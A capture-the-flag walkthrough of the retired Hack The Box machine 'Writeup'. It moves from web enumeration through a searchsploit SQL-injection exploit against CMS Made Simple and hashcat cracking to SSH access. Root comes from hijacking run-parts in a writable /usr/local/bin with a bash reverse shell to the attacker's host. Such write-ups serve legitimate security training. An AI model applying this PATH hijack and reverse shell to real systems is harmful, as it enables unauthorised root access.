HTB Walkthrough: Writeup (retired)
Writeup is a retired box on HTB.
Hostname: Writeup | Difficulty Level: Easy | Operating System: Linux
NMAP scan
We can see port 22 and 80 open.
HTTP Enumeration
Browsing to ‘http://10.10.10.138’ reveals that it was under DOS attack so it is prevented by Eeyore DoS protection. Lets check for common files such as robots.txt, admin, etc. manually.
We get a hit for ‘http://10.10.10.138/robots.txt’.
It says ‘Disallow: /writeup/’. The disallow directive specifies paths that must not be accessed by the designated crawlers. When no path is specified, the directive is ignored. Browsing to ‘http://10.10.10.138/writeup/’ reveals a web page.
Running gobuster reveals a login page at ‘http://10.10.10.138/admin’.
┌──(kali㉿kali)-[~/labs/HTB/Writeup]
└─$ sudo gobuster dir -t 50 — url http://10.10.10.138/writeup — wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt/modules (Status: 301)
/uploads (Status: 301)
/doc (Status: 301)
/assets (Status: 301)
/admin (Status: 401)
If you view source code for ‘http://10.10.10.138/writeup/’ then you will see that it is ‘CMS Made Simple’.
Google search for ‘CMS Made Simple’ and look for the code. http://www.cmsmadesimple.org/downloads/cmsms. Since it is open source, you can visit the directory structure here: http://svn.cmsmadesimple.org/svn/cmsmadesimple/trunk/. Even that reveals that there is an ‘/admin’ portal. Further, you can view the version of CMS from ‘/doc/CHANGELOG.txt’ i.e. browse to ‘http://10.10.10.138/writeup/doc/CHANGELOG.txt’. CHANGELOG.txt will reveal the version to be ‘2.2.9.1’.
Exploitation
Looking into searchsploit.
┌──(kali㉿kali)-[~/labs/HTB/Writeup]
└─$ searchsploit CMS Made Simple
┌──(kali㉿kali)-[~/labs/HTB/Writeup]
└─$ searchsploit -m php/webapps/46635.py
Using the ‘CMS Made Simple < 2.2.10 — SQL Injection’.
Pre-requisities: Install pip for python2 and install package ‘termcolor’
i. curl https://bootstrap.pypa.io/get-pip.py — output get-pip.py
ii. sudo python2 get-pip.py
iii. pip — version (Make sure it belongs to python2)
iv. sudo pip install — upgrade setuptools
v. sudo python2.7 -m pip install termcolor
In order to find the hash type of password hash found above, use ‘hash-identifier’ tool. It suggests MD5. So, let’s use hashcat to crack the password with mode ‘20’. Save the ‘hash:salt’ in a file. Modes 10 and 20 use ‘hash:salt’ format.
Trying the credentials on ‘http://10,10.10.138/writeup/admin' did not work. Trying ssh using the credentials and you will be logged in as ‘jkr’ user. You will user flag.
Privilege Escalation
We do not have execution permissions in /dev/shm. Trying to run ‘pspy’ in /tmp folder. Keep ‘pspy64s’ running in one tab and try to do ssh from another tab, you will see below entry (one with incomplete path):
2021/02/15 18:14:08 CMD: UID=0 PID=2454 | sshd: jkr [priv]
2021/02/15 18:14:08 CMD: UID=0 PID=2455 | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts — lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
2021/02/15 18:14:08 CMD: UID=0 PID=2456 | run-parts — lsbsysinit /etc/update-motd.d
2021/02/15 18:14:08 CMD: UID=0 PID=2457 | /bin/sh /etc/update-motd.d/10-uname
2021/02/15 18:14:08 CMD: UID=0 PID=2458 | sshd: jkr [priv]
jkr@writeup:/tmp$ which run-parts
/bin/run-parts
jkr@writeup:/bin$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
Since, /usr/local/bin comes before ‘/bin’, we could perform path injection. Create a file ‘run-parts’ in ‘/usr/local/bin’. We have privileges to create file in ‘/usr/local/bin’ because jkr is member of ‘staff’ (from LinEnum.sh)
jkr@writeup:/tmp$ ls -la /usr/local | grep bin
drwx-wsr-x 2 root staff 20480 Feb 15 21:40 bin
drwx-wsr-x 2 root staff 12288 Apr 19 2019 sbin
As per article at ‘https://raspberrypi.stackexchange.com/questions/67670/what-is-the-purpose-of-group-staff’
staff: Allows users to add local modifications to the system (/usr/local) without needing root privileges (note that executables in /usr/local/bin are in the PATH variable of any user, and they may “override” the executables in /bin and /usr/bin with the same name).
Contents of file ‘/usr/local/bin/run-parts’ are as follows:
#!/bin/bash
bash -i >& /dev/tcp/<kali-ip>/9876 0>&1
jkr@writeup:/usr/local/bin$ chmod +x run-parts
Open a netcat session on port 9876 or any other port in kali machine. SSH using jkr credentials and you will get a root shell in your netcat session along with root flag.
